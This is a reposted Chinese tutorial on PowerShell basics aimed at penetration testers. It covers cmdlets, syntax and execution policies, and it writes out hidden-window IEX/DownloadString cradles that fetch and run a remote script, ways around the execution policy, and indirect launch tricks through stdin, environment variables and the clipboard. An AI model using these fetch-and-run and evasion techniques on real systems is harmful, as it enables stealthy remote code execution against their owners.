当前位置:   article > 正文

Powershell渗透框架_powershell 渗透框架

powershell 渗透框架

Powershell基础

Powershell简介

什么是 Windows PowerShell

Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言,基于 .NET 框架。

是Microsoft的新Shell,它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集结合在一起。

用于控制和自动化管理Windows操作系统和运行在操作系统上的应用。

被广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避 Anti-Virus 检测。

Windows PowerShell 中的命令称为 cmdlet ,发音为“ command-lets ”,其中每个 cmdlet 代表特定的功能或基于任务的脚本。

Powershell 默认安装在Win7及以后的系统上。

操作系统信任

提供Windows操作系统的几乎一切访问权限

Windows PowerShell 集成脚本环境(ISE)

为什么使用 Windows PowerShell

它既是脚本语言,又是命令行Shell。它可以与不同数量的技术进行交互。

Windows PowerShell允许完全访问.NET框架中的所有类型。PowerShell是基于对象的。

Microsoft为各种产品设计的GUI的许多接口是PowerShell的前端接口。

它比运行VBScript或其他脚本语言更安全。

通过组合多个命令和编写脚本,它可以更有效地执行重复性任务。假设系统管理员希望创建数百个活动目录用户,那么他只能借助脚本中放置的某些 PowerShell cmdlet 来实现此目的。

使用PowerShell的简单cmdlet可以在一秒钟内完成许多复杂且耗时的配置和任务。

如何启动 Windows PowerShell

所有最新版本的 Windows 中都可以使用 PowerShell 。

我们需要按照给定的步骤启动 PowerShell :搜索 Windows PowerShell 。选择并单击。 PowerShell窗口将打开。

PowerShell和Cmd命令提示符的区别

PowerShell
1、它是基于.NET框架的基于任务的自动化命令行
界面和关联的脚本语言。

2、它可以解释批处理和PowerShell命令。

3、它用于控制和自动化Windows服务器上的应用
程序和Windows操作系统。

4、PowerShell生成的输出不仅是字符流,而且是
对象的集合。

5、它既是Shell程序又是脚本编制环境,它支持创
建用于管理Windows操作系统的大文件。
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
cmd
1、它是Microsoft Windows操作系统的默认
命令行解释器。

2、它只能解释批处理命令。

3、它用于在控制台上执行给定的命令,可用
于调试问题。

4、命令提示符生成的输出只是字符流(文本)。

5、它只是一个shell系统,它允许用户仅执行
简单和基本的脚本来执行批处理文件。
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12

管理员运行 PowerShell

在Windows操作系统中,有五种方法可以以管理员身份运行PowerShell:

1、使用运行窗口(对于所有版本的Windows),以管理员身份运行PowerShell。
2、使用Cortana搜索栏(对于Windows 10)以管理员身份运行PowerShell。
3、在命令提示符下以管理员身份运行PowerShell。
4、从任务管理器以管理员身份运行PowerShell。
5、从“开始”菜单以管理员身份运行PowerShell。

Windows PowerShell ISE

Microsoft Windows PowerShell ISE 是基于图形用户界面的应用程序,并且是Windows PowerShell的默认编辑器。

ISE代表集成脚本环境。它是一个界面,我们可以在这个界面中运行命令以及编写,测试和调试PowerShell脚本,而无需在命令行界面中编写所有命令。

集成脚本环境(ISE)提供选项卡补全,多行编辑,语法着色,上下文相关帮助,选择性执行以及对从右到左语言的支持。

PowerShell的ISE窗口包含以下三个窗格:

脚本窗格:此窗格允许用户创建和运行脚本。 用户可以在脚本窗格中轻松打开,编辑和运行现有脚本。

输出窗格:此窗格显示脚本的输出以及运行的命令。还可以清除并复制“输出”窗格中的内容。

命令窗格:此窗格允许用户编写命令。在命令窗格中轻松执行单行或多行命令。

创建并运行脚本

文本编辑器创建脚本

打开任意文本编辑器,写入测试脚本内容:

echo "Hello world"
  • 1

保存文件名为 test.ps1,双击即可运行!

集成脚本环境创建脚本

打开 Windows PowerShell ISE ,新建一个空文件,写入要执行的脚本内容,保存文件名为test.ps1

菜单栏点击运行,或快捷键 F5 运行脚本

加载执行本地脚本

powershell -f test.ps1  #需要指定路径
  • 1

加载执行远程脚本

Powershell 远程下载代码脚本执行

powershell -c "Invoke-Expression (New-Object 
System.Net.WebClient).DownloadString('https://192.168.88.128:80/test.ps1')"
  • 1
  • 2

Invoke-Expression(IEX的别名):用来把字符串当作命令执行。

WindowStyle Hidden(-w Hidden):隐藏窗口

Nonlnteractive(-NonI):非交互模式,PowerShell不为用户提供交互的提示。

NoProfile(-NoP):PowerShell控制台不加载当前用户的配置文件。

Noexit(-Noe):执行后不退出Shell。

EncodedCommand(-enc): 接受base64 encode的字符串编码,避免一些解析问题
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

WebClient 类:提供用于将数据发送到由 URI 标识的资源以及从这样的资源接收数据的常用方法。

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient?view=net-6.0

DownloadString 方法:以 String 形式下载请求的资源。 可以以包含 URI 的 String 或 Uri 的形式指定要下载的资源。

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient.downloadstring?view=net-6.0

脚本执行策略

在计算机系统中启动PowerShell时,默认执行策略不允许我们执行或运行脚本。

查看当前执行策略

Get-ExecutionPolicy
  • 1

获取影响当前会话的所有执行策略,并按优先顺序显示它们

Get-ExecutionPolicy -List
  • 1

将执行策略设置为 Bypass

Set-ExecutionPolicy Bypass

#需要使用管理员权限启动power shell
  • 1
  • 2
  • 3

对特定的用户执行策略设置

Set-ExecutionPolicy Unrestricted -Scope LocalMachine
  • 1

详细查看: https://learn.microsoft.com/zh-cn/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

PowerShell中可以设置以下类型的执行策略:

名称说明
AllSignedAllSigned 允许执行所有具有数字签名的脚本。
Bypass不阻止任何操作,并且没有任何警告或提示。
Default设置默认执行策略。Restricted 适用于 Windows 客户端。为 Windows 服务器远程签名
RemoteSigned允许执行具有数字签名的通过网络下载的脚本;本地创建的脚本不要求脚本具有数字签名,可以直接执行。
Restricted受限制的,可以执行单个的命令,但不能执行脚本,执行就会报错,Windows8,Windows 8.1,Windows Server 2012中默认策略。
UndefinedUndefined 表示没有设置脚本策略。当然此时会发生继承或应用默认的脚本策略。
Unrestricted允许运行未签名的脚本。从网络上下载的脚本,在运行前会进行安全性提示。需要确认是否执行脚本。

Bypass 最为常用

绕过执行策略

本地读取然后通过管道符运行

powershell Get-Content C:\Users\xxxxx\Desktop\powershell\test.ps1 | powershell -
  • 1

远程下载并通过IEX运行脚本

powershell -w hidden "IEX(New-Object
Net.WebClient).DownloadString('http://192.168.88.128:80/test.ps1')"
  • 1
  • 2

Bypass执行策略绕过

powershell -executionpolicy bypass -f C:\Users\xxx\Desktop\powershell\test.ps1
  • 1

Unrestricted执行策略

powershell -executionpolicy unrestricted -f C:\Users\xxxx\Desktop\powershell\test.ps1
  • 1

PowerShell注释

单行注释

单行注释是在每行的开头键入井号 # 的注释。 # 符号右边的所有内容都将被忽略。 如果在脚本中编写多行,则必须在每行的开头使用井号 # 符号。

# 单行注释.............
  • 1

多行注释

要注释多行,请将 <# 符号放在第一行的开头,将 #> 符号放在最后一行的末尾。

<# 多行注释.........  
多行注释.........  
多行注释....................#>
  • 1
  • 2
  • 3

PowerShell Cmdlet

Cmdlets 是 PowerShell 的非常重要的内部命令集。

Cmdlet 发音为” command-lets ”,它是在 PowerShell 环境中使用的轻量级命令。 这些是在PowerShell环境中实现特殊功能的特殊命令。

Cmdlet 遵循“动词-名词”模式,例如: set-childItem

Cmdlet 是以 .NET 类实例形式存在的命令。 Cmdlets 可以用任何 .NET 语言来编写,也可以用PowerShell 脚本语言来编写。

它并不是简单的可执行文件,它有很多属性,这些属性用来指定输入参数或者使用管道来管理重定向。我们可以通过输入 Get-Command 可以显示可用的 Cmdlets 命令。

Get-Command -CommandType Cmdlet
  • 1

常用Cmdlet命令

查看 powershell 版本

$PSVersionTable

#别名 Get-Host
  • 1
  • 2
  • 3

查看当前环境变量


Get-ChildItem env:

#别名gci ls dir
  • 1
  • 2
  • 3
  • 4

启动指定程序

Start-Process calc.exe

saps explorer.exe
 
#别名 saps start
  • 1
  • 2
  • 3
  • 4
  • 5

获取指定进程信息

Get-Process
Get-Process explorer

#别名 gps ps
  • 1
  • 2
  • 3
  • 4

获取文件信息

Get-Item 1.txt

#别名 gi
  • 1
  • 2
  • 3

复制文件

Copy-Item 1.txt 2.txt

#别名 cpi cp copy
  • 1
  • 2
  • 3

移动文件

Move-Item 1.txt 2.txt

#别名 mi mv move
  • 1
  • 2
  • 3

获取指定服务信息

Get-Service -Name Everything
  • 1

获取文件Hash

Get-FileHash -Algorithm SHA1 1.txt
Get-FileHash -Algorithm MD5 1.txt
  • 1
  • 2

设置文本内容

Set-Content 1.txt -Value "hello, word"

#别名 sc
  • 1
  • 2
  • 3

删除文件的内容,但不删除该文件

Clear-Content 1.txt
  • 1

获取当前目录

Get-Location

#别名gl pwd
  • 1
  • 2
  • 3

查看别名

Get-Alias -name dir
  • 1

基本语法

管道符

|     #将一个命令的输出作为另一个命令的输入
  • 1

分号

;   #分号用来连续执行系统命令
  • 1

调用操作符

&   ##调用操作符,它允许你执行命令,脚本或函数
  • 1

输出单双引号

""""
# 输出双引号
''''   
# 输出单引号
  • 1
  • 2
  • 3
  • 4

运输符

>   #将输出保存到指定文件中(用法:Get-Process > output.txt)
>>  #将脚本的输出追加到指定文件中(用法:test.ps1 >> output.txt)
2>  #将错误输出到指定文件中(Get-Porcess none 2> Errors.txt)
2>> #将错误追加到指定文件中(Get-Process none 2>> logs-Errors.txt)
-eq #等于运算符(用法:$var1 –eq $var2,返回真或假)
-gt #大于运算符(用法:$var1 –gt $var2,返回真或假)
-match     #匹配运算符,搜索字符串是否在文中出现(用法:$Text –match $string,返回真或假)
-replace   #替换字符串(用法:$Text –replace 被替换的字符,替换的字符,返回真或假)
-in       #测试一个字符或数字是否出现在文本中或列表中,声明列表直接使用()
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

变量

变量都是以 $ 开头

$w = "hello world"   # 变量赋值
$w   # 访问变量
  • 1
  • 2

数组

$a = 'value1','value2','value3'     # 创建数组
$a[0]   # 访问数组第一个元素
$a = @()   # 空数组
$a = 1,'two',(get-date)
  • 1
  • 2
  • 3
  • 4

语句

条件语句

if($var {comparison_statement} $var2) {What_To_Do}
else {what_to_if_not}
  • 1
  • 2

循环语句

while() {}
Do {} While()
For(;;;) {}
  • 1
  • 2
  • 3

Cmd启动Powershell

常规方法

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"
  • 1
  • 2
  • 3

管道输入流

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"
  • 1

环境变量

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && cmd /c echo %cmd% | powershell -"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX ([Environment]::GetEnvironmentVariable('cmd','Process'));"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green&&powershell IEX ((Get-ChildItem env:cmd).Value)"
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

从粘贴板执行

cmd.exe /c "echo Write-Host CLIP -Fore Green | clip && powershell [void]  
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); IEX 
([System.Windows.Forms.Clipboard]::GetText())"
  • 1
  • 2
  • 3

bat脚本执行

@echo off
powershell -c Write-Host SUCCESS -Fore Green
pause

#不想有'请按任意键继续...' 可以去掉pause
  • 1
  • 2
  • 3
  • 4
  • 5

[未完待续,后面会更新CobaltStrikePowerShell加载器以及PowerSploit后渗透框架…]

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/152842
推荐阅读
相关标签
  

闽ICP备14008679号